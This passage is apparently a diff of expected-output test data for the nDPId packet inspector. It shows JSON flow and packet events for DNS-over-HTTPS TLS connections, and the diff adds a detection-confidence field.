{"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4cSyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDFEm0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"}
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9ZfHWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8ki7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"}
-00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
